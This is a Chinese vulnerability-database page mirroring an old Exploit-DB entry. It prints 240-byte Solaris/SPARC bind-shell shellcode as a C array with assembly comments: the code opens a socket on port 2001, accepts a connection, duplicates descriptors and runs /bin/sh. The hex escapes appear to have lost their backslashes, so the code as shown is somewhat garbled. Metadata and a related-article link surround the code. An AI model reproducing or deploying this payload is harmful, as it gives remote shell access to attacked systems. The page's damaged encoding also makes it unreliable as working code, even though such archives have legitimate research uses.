Solaris/SPARC – Bind (/TCP) Shell Shellcode (240 bytes)-安全小百科

Solaris/SPARC – Bind (/TCP) Shell Shellcode (240 bytes)

漏洞ID	1053485	漏洞类型
发布时间	2000-11-19	更新时间	2000-11-19
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Solaris_SPARC	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13497

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*

  Solaris - Sparc -> www.dopesquad.net

*/

char shellcode[] =
  "xa0x23xa0x10"	/* sub    	%sp, 16, %l0 */
  "xaex23x80x10"	/* sub    	%sp, %l0, %l7 */
  "xeex23xbfxec"	/* st     	%l7, [%sp - 20] */
  "x82x05xe0xd6"	/* add    	%l7, 214, %g1 */
  "x90x25xe0x0e"	/* sub    	%l7, 14, %o0 */
  "x92x25xe0x0e"	/* sub    	%l7, 14, %o1 */
  "x94x1cx40x11"	/* xor    	%l1, %l1, %o2 */
  "x96x1cx40x11"	/* xor    	%l1, %l1, %o3 */
  "x98x25xe0x0f"	/* sub    	%l7, 15, %o4 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "xa4x1ax80x08"	/* xor    	%o2, %o0, %l2 */
  "xd2x33xbfxf0"	/* sth    	%o1, [%sp - 16] */
  "xacx10x27xd1"	/* mov    	2001, %l6 */
  "xecx33xbfxf2"	/* sth    	%l6, [%sp - 14] */
  "xc0x23xbfxf4"	/* st     	%g0, [%sp - 12] */
  "x82x05xe0xd8"	/* add    	%l7, 216, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x1axc0x17"	/* xor    	%o3, %l7, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x82x05xe0xd9"	/* add    	%l7, 217, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x25xe0x0b"	/* sub    	%l7, 11, %o1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x82x05xe0xda"	/* add    	%l7, 218, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x23xa0x14"	/* sub    	%sp, 20, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "xa6x1axc0x08"	/* xor    	%o3, %o0, %l3 */
  "x82x05xe0x2e"	/* add    	%l7, 46, %g1 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x01"	/* add    	%o3, 1, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x02"	/* add    	%o3, 2, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x17"	/* add    	%o3, 23, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x21x0bxd8x9a"	/* sethi  	%hi(0x2f626800), %l0 */
  "xa0x14x21x6e"	/* or     	%l0, 0x16e, %l0	! 0x2f62696e */
  "x23x0bxdcxda"	/* sethi  	%hi(0x2f736800), %l1 */
  "x90x23xa0x10"	/* sub    	%sp, 16, %o0 */
  "x92x23xa0x08"	/* sub    	%sp, 8, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "xe0x3bxbfxf0"	/* std    	%l0, [%sp - 16] */
  "xd0x23xbfxf8"	/* st     	%o0, [%sp - 8] */
  "xc0x23xbfxfc"	/* st     	%g0, [%sp - 4] */
  "x82x02xe0x3b"	/* add    	%o3, 59, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x01"	/* add    	%o3, 1, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
;



# milw0rm.com [2000-11-19]

相关推荐: Windows Office Shortcut Bar (OSB)权限许可和访问控制漏洞

Windows Office Shortcut Bar (OSB)权限许可和访问控制漏洞漏洞ID 1206717 漏洞类型未知发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1294 CNNVD-ID CNN…

文章版权归作者所有，未经允许请勿转载。

THE END